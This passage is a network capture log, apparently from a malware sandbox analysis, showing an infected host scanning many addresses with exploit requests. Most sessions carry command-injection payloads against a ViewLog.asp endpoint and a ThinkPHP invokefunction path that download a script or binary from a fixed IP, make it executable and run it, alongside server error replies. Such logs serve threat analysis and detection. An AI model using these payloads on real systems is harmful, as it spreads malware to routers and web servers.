                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            293192.168.2.234055494.121.196.2288080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:29.079751015 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            294192.168.2.234361494.122.1.318080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:29.079741001 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            295192.168.2.234477494.121.19.638080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:29.111335039 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            296192.168.2.235160295.101.6.18280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:29.512375116 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:29.711154938 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:28:29 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:29 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 62 36 62 30 66 37 34 38 26 23 34 36 3b 31 37 30 37 38 39 39 33 30 39 26 23 34 36 3b 32 35 36 63 65 66 30 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;b6b0f748&#46;1707899309&#46;256cef08</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            297192.168.2.235314095.101.114.12480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:29.517745018 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:29.725272894 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:28:29 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:29 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 37 63 37 32 36 35 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 33 30 39 26 23 34 36 3b 31 32 32 62 65 62 31 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;7c72655f&#46;1707899309&#46;122beb19</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            298192.168.2.235634895.67.71.23480
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:29.542062044 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:29.773921013 CET113INHTTP/1.1 400 Bad Request
                                                            Connection: close
                                                            Content-Type: text/plain
                                                            Transfer-Encoding: chunked
                                                            Feb 14, 2024 09:28:29.774075031 CET33INData Raw: 42 0d 0a 42 61 64 20 52 65 71 75 65 73 74 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: BBad Request0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            299192.168.2.236055095.174.12.318080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:29.594235897 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:29.814802885 CET1286INHTTP/1.1 404 Not Found
                                                            Server: GlassFish Server Open Source Edition 5.0
                                                            X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 5.0 Java/Oracle Corporation/1.8)
                                                            Content-Language:
                                                            Content-Type: text/html
                                                            Content-Length: 1082
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6c 61 73 73 46 69 73 68 20 53 65 72 76 65 72 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 45 64 69 74 69 6f 6e 20 20 35 2e 30 20 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 2f 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 3c 70 3e 3c 62 3e 64 65 73 63 72 69 70 74 69 6f 6e 3c 2f 62 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 2e 3c 2f 70 3e 3c 68 72 2f 3e 3c 68 33 3e
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>GlassFish Server Open Source Edition 5.0 - Error report</title><style type="text/css">...H1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} H2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} H3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} BODY {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} B {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} P {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}A {color : black;}HR {color : #525D76;}--></style> </head><body><h1>HTTP Status 404 - Not Found</h1><hr/><p><b>type</b> Status report</p><p><b>message</b>Not Found</p><p><b>description</b>The requested resource is not available.</p><hr/><h3>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            300192.168.2.233553885.214.39.1548080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:29.594305992 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:29.817734003 CET498INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:29 GMT
                                                            Server: Apache/2.4.54 (Ubuntu)
                                                            Content-Length: 304
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 34 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.54 (Ubuntu) Server at 192.168.0.14 Port 80</address></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            301192.168.2.235069288.114.193.10880
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:30.006330013 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:30.239705086 CET37INHTTP/1.1 404 Site or Page Not Found
                                                            Feb 14, 2024 09:28:30.242825985 CET97INData Raw: 53 65 72 76 65 72 3a 20 47 6f 41 68 65 61 64 2d 57 65 62 73 0d 0a 44 61 74 65 3a 20 53 61 74 20 4a 61 6e 20 20 31 20 30 30 3a 30 30 3a 30 30 20 32 30 30 30 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74
                                                            Data Ascii: Server: GoAhead-WebsDate: Sat Jan 1 00:00:00 2000Pragma: no-cacheCache-Control: no-cache


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            302192.168.2.2333832112.198.27.2280
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:30.030817986 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:31.007054090 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:32.958749056 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:37.054291964 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:44.989187002 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:00.602896929 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:32.342492104 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            303192.168.2.234825262.218.130.2128080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:31.056020021 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            304192.168.2.236044662.249.167.298080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:31.059436083 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            305192.168.2.233574294.121.117.2528080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:31.080133915 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            306192.168.2.235562694.126.20.1078080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:31.255449057 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:31.455310106 CET498INHTTP/1.1 400 Bad Request
                                                            Date: Wed, 14 Feb 2024 08:28:31 GMT
                                                            Server: Apache/2.4.18 (Ubuntu)
                                                            Content-Length: 304
                                                            Connection: close
                                                            Content-Type: text/html; charset=iso-8859-1
